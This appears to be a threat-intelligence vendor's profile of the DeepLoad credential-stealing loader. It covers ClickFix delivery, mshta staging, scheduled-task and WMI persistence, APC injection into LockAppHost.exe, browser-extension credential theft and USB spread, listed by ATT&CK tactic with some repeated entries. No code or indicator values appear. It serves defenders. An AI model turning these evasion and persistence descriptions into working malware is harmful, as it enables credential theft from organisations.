DeepLoad
DeepLoad is a credential-stealing malware/loader tracked by ReliaQuest and observed targeting enterprise IT environments. It is delivered via the ClickFix social-engineering technique, including fake browser prompts or error pages that trick users into executing malicious PowerShell commands through Windows Run, Windows Terminal, or PowerShell. The infection chain abuses mshta.exe to contact attacker-controlled staging infrastructure and retrieve a heavily obfuscated PowerShell loader. Reporting states the loader contains thousands of meaningless variable assignments, assessed with high confidence by ReliaQuest to be AI-generated obfuscation intended to hinder static analysis and evade detection.
DeepLoad establishes persistence through a scheduled task that re-executes the loader on reboot and through hidden WMI event subscriptions that can silently redeploy the malware after apparent remediation. In at least one observed case, a WMI subscription re-executed the attack three days after a host appeared clean. The malware operates largely filelessly, decrypting payloads in memory via a short XOR routine, using PowerShell Add-Type to compile a temporary C# injector/DLL with randomized filenames, and performing APC-based process injection into LockAppHost.exe, a legitimate Windows lock screen process.
Its primary capability is credential theft. ReliaQuest reported that DeepLoad can collect stored credentials, extract browser passwords, capture newly entered credentials in real time via keylogging, and deploy a malicious browser extension that steals passwords and session tokens as users type them. A credential stealer named filemanager.exe may be dropped and can continue exfiltrating data over its own command-and-control channel even if the primary loader is blocked. DeepLoad was also observed disabling PowerShell command history to reduce forensic visibility.
The campaign was observed spreading to connected USB drives within minutes of infection, writing more than 40 disguised files including fake Chrome, Firefox, and AnyDesk installers or shortcuts, indicating likely propagation beyond the initially infected host. Researchers also observed ClickFix campaigns delivering DeepLoad on Windows systems. High-confidence indicators and artifacts mentioned in the content include abuse of mshta.exe, scheduled tasks, WMI event subscriptions, injection into LockAppHost.exe, the dropped stealer filemanager.exe, malicious browser extensions, and USB-borne lure filenames such as ChromeSetup.lnk, Firefox Installer.lnk, and AnyDesk.lnk.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
25 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
It is common for attackers to compromise legitimate websites or create convincing phishing pages and substitute counterfeit CAPTCHA screens for verification prompts that require visitors to perform a series of manual tasks, including executing a command copied to the clipboard.
Execution
5 techniques
Execution
In this instance, the command immediately creates a scheduled task to re-execute the loader, so it persists across reboots or partial detection, without the user having to do anything thereafter.
In this campaign, this one command was enough to establish persistent, reboot-surviving access by creating a scheduled task configured to repeatedly re-execute the loader.
These commands typically launch PowerShell, which retrieves and executes remote payloads, thereby enabling the deployment of information stealers and other malicious applications.
Persistence
4 techniques
Persistence
In this instance, the command immediately creates a scheduled task to re-execute the loader, so it persists across reboots or partial detection, without the user having to do anything thereafter.
In this campaign, this one command was enough to establish persistent, reboot-surviving access by creating a scheduled task configured to repeatedly re-execute the loader.
Privilege Escalation
5 techniques
Privilege Escalation
In this instance, the command immediately creates a scheduled task to re-execute the loader, so it persists across reboots or partial detection, without the user having to do anything thereafter.
In this campaign, this one command was enough to establish persistent, reboot-surviving access by creating a scheduled task configured to repeatedly re-execute the loader.
ReliaQuest’s report also describes how the DeepLoad malware hides in the Windows operation system by embedding itself in the rarely scrutinized process that runs the Windows lock screen.
Stealth
10 techniques
Stealth
That loader contained “thousands of meaningless variable assignments that resemble routine scripting,” and researchers said this “busy” design was meant to hide the loader’s malicious functionality inside the noise.
To carry out the injection DeepLoad uses a PowerShell feature called Add-Type to generate a temporary Dynamic Link Library (DLL) that is dropped into the compromised computer's Temp directory.
ReliaQuest urged organizations to perform ongoing behavioral analysis of computers on their networks to catch the malware in the act, given that its fileless operations can bypass more traditional static defenses.
The security vendor found the malware writing more than 40 files disguised as Chrome setup files, Firefox installers, AnyDesk shortcuts and other familiar installers, to the USB drive of a compromised host.
ReliaQuest’s report also describes how the DeepLoad malware hides in the Windows operation system by embedding itself in the rarely scrutinized process that runs the Windows lock screen.
Through asynchronous procedure call (APC) injection, the loader places shellcode into that process’s memory and triggers execution on resume...
The malware also disables PowerShell command history to cover its own tracks.
The actual logic — a short XOR decryption routine — sits at the bottom and decrypts shellcode in memory, so no decoded payload touches disk.
Credential Access
4 techniques
Credential Access
A malicious browser extension captures passwords and session tokens as users type them, persisting across sessions until removed.
Researchers have uncovered a new malware strain capable of stealing credentials immediately after gaining a foothold on a victim network, capturing both stored browser passwords and live keystrokes in real time through a standalone stealer and a malicious browser extension.
Lateral Movement
1 technique
Lateral Movement
Command and Control
1 technique
Command and Control
IOCs tracked for this family
3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A malware family delivered via ClickFix campaigns on Windows systems.
Credential-stealing malware designed to evade detection.
Credential-stealing malware campaign using ClickFix-style lures and a loader with suspected AI-assisted obfuscation to evade security tools. It enables real-time keylogging, persists via backup mechanisms, and can spread to connected USB drives.
DeepLoad is a newly discovered malware targeting enterprise environments. It uses a ClickFix social-engineering lure to trick users into executing a PowerShell command, establishes persistence via scheduled tasks and hidden WMI event subscriptions, fetches obfuscated payloads with mshta.exe, injects shellcode into trusted Windows processes, steals credentials and session tokens, and propagates via USB drives using disguised installer files and fake shortcuts.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.